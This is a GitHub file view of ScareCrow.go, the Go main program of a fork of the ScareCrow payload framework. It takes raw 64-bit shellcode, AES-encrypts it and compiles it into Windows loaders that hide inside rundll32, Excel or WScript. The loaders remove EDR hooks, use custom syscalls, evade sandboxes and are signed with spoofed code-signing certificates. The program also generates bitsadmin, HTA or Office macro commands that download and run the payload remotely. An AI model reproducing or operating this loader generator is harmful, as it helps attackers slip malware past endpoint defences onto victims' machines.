forked from optiv/ScareCrow
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathScareCrow.go
165 lines (148 loc) · 6.96 KB
/
ScareCrow.go
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
package main
import (
"ScareCrow/Cryptor"
"ScareCrow/Loader"
"ScareCrow/limelighter"
"bytes"
"crypto/aes"
"crypto/cipher"
"encoding/base64"
"encoding/hex"
"flag"
"fmt"
"io/ioutil"
"log"
"os/exec"
)
type FlagOptions struct {
outFile string
inputFile string
URL string
LoaderType string
CommandLoader string
domain string
password string
valid string
console bool
refresher bool
sandbox bool
}
func options() *FlagOptions {
outFile := flag.String("O", "", "Name of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.")
inputFile := flag.String("I", "", "Path to the raw 64-bit shellcode.")
console := flag.Bool("console", false, "Only for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.")
LoaderType := flag.String("Loader", "binary", `Sets the type of process that will sideload the malicious payload:
[*] binary - Generates a binary based payload. (This type does not benfit from any sideloading)
[*] control - Loads a hidden control applet - the process name would be rundll32.
[*] dll - Generates just a DLL file. Can executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.
[*] excel - Loads into a hidden Excel process.
[*] wscript - Loads into WScript process.
`)
refresher := flag.Bool("unmodified", false, "When enabled will generate a DLL loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls (set to false by default)")
URL := flag.String("url", "", "URL associated with the Delivery option to retrieve the payload. (e.g. https://acme.com/)")
CommandLoader := flag.String("delivery", "", `Generates a one-liner command to download and execute the payload remotely:
[*] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader.
[*] hta - Generates a blank hta file containing the loader along with a MSHTA command execute the loader remotely in the background.
[*] macro - Generates an office macro that will download and execute the loader remotely.`)
domain := flag.String("domain", "", "The domain name to use for creating a fake code signing cert. (e.g. Acme.com) ")
password := flag.String("password", "", "The password for code signing cert. Required when -valid is used.")
valid := flag.String("valid", "", "The path to a valid code signing cert. Used instead -domain if a valid code signing cert is desired.")
sandbox := flag.Bool("sandbox", false, `Enables sandbox evasion using IsDomainedJoined calls.`)
flag.Parse()
return &FlagOptions{outFile: *outFile, inputFile: *inputFile, URL: *URL, LoaderType: *LoaderType, CommandLoader: *CommandLoader, domain: *domain, password: *password, console: *console, refresher: *refresher, valid: *valid, sandbox: *sandbox}
}
func execute(opt *FlagOptions, name string) {
bin, _ := exec.LookPath("env")
var compiledname string
limelighter.FileProperties(name)
var cmd *exec.Cmd
if opt.LoaderType == "binary" {
cmd = exec.Command(bin, "GOROOT_FINAL=/dev/null", "GOOS=windows", "GOARCH=amd64", "go", "build", "-a", "-trimpath", "-ldflags", "-s -w", "-o", ""+name+".exe")
} else {
cmd = exec.Command(bin, "GOOS=windows", "GOARCH=amd64", "CGO_ENABLED=1", "CC=x86_64-w64-mingw32-gcc", "CXX=x86_64-w64-mingw32-g++", "go", "build", "-a", "-trimpath", "-ldflags", "-w -s", "-o", ""+name+".dll", "-buildmode=c-shared")
}
fmt.Println("[*] Compiling Payload")
var out bytes.Buffer
var stderr bytes.Buffer
cmd.Stdout = &out
cmd.Stderr = &stderr
err := cmd.Run()
if err != nil {
fmt.Printf("%s: %s\n", err, stderr.String())
}
if opt.LoaderType == "binary" {
compiledname = name + ".exe"
} else {
compiledname = name + ".dll"
}
fmt.Println("[+] Payload Compiled")
limelighter.Signer(opt.domain, opt.password, opt.valid, compiledname)
}
func main() {
fmt.Println(`
_________ _________
/ _____/ ____ _____ _______ ____ \_ ___ \_______ ______ _ __
\_____ \_/ ___\\__ \\_ __ \_/ __ \/ \ \/\_ __ \/ _ \ \/ \/ /
/ \ \___ / __ \| | \/\ ___/\ \____| | \( <_> ) /
/_______ /\___ >____ /__| \___ >\______ /|__| \____/ \/\_/
\/ \/ \/ \/ \/
(@Tyl0us)
“Fear, you must understand is more than a mere obstacle.
Fear is a TEACHER. the first one you ever had.”
`)
opt := options()
if opt.inputFile == "" {
log.Fatal("Error: Please provide a path to a file containing raw 64-bit shellcode (i.e .bin files)")
}
if opt.CommandLoader != "" && opt.URL == "" {
log.Fatal("Error: Please provide the url the loader will be hosted on in order to generate a delivery command")
}
if opt.LoaderType != "dll" && opt.LoaderType != "binary" && opt.LoaderType != "control" && opt.LoaderType != "excel" && opt.LoaderType != "wscript" {
log.Fatal("Error: Invalid loader, please select one of the allowed loader types")
}
if opt.CommandLoader != "" && opt.CommandLoader != "bits" && opt.CommandLoader != "hta" && opt.CommandLoader != "macro" {
log.Fatal("Error: Invalid delivery option, please select one of the allowed delivery types")
}
if opt.outFile != "" && opt.LoaderType == "binary" {
log.Fatal("Error: -O not needed. These loader types use the name of the file they are spoofing")
}
if opt.LoaderType == "binary" && opt.refresher == true {
log.Fatal("Error: Can not use the unmodified option with a binary loader")
}
if opt.console == true && opt.LoaderType != "binary" {
log.Fatal("Error: Console mode is only for binary based payloads")
}
if opt.domain == "" {
log.Fatal("Error: Please provide a domain in order to generate a code signing certificate")
}
if opt.password == "" && opt.valid != "" {
log.Fatal("Error: Please provide a password for the valid code signing certificate")
}
var rawbyte []byte
src, _ := ioutil.ReadFile(opt.inputFile)
dst := make([]byte, hex.EncodedLen(len(src)))
hex.Encode(dst, src)
r := base64.StdEncoding.EncodeToString(dst)
rawbyte = []byte(r)
key := Cryptor.RandomBuffer(32)
iv := Cryptor.RandomBuffer(16)
block, err := aes.NewCipher(key)
if err != nil {
log.Fatal(err)
}
paddedInput, err := Cryptor.Pkcs7Pad([]byte(rawbyte), aes.BlockSize)
if err != nil {
log.Fatal(err)
}
fmt.Println("[*] Encrypting Shellcode Using AES Encryption")
cipherText := make([]byte, len(paddedInput))
ciphermode := cipher.NewCBCEncrypter(block, iv)
ciphermode.CryptBlocks(cipherText, paddedInput)
b64ciphertext := base64.StdEncoding.EncodeToString(cipherText)
b64key := base64.StdEncoding.EncodeToString(key)
b64iv := base64.StdEncoding.EncodeToString(iv)
fmt.Println("[+] Shellcode Encrypted")
name, filename := Loader.CompileFile(b64ciphertext, b64key, b64iv, opt.LoaderType, opt.outFile, opt.refresher, opt.console, opt.sandbox)
execute(opt, name)
Loader.CompileLoader(opt.LoaderType, opt.outFile, filename, name, opt.CommandLoader, opt.URL, opt.sandbox)
}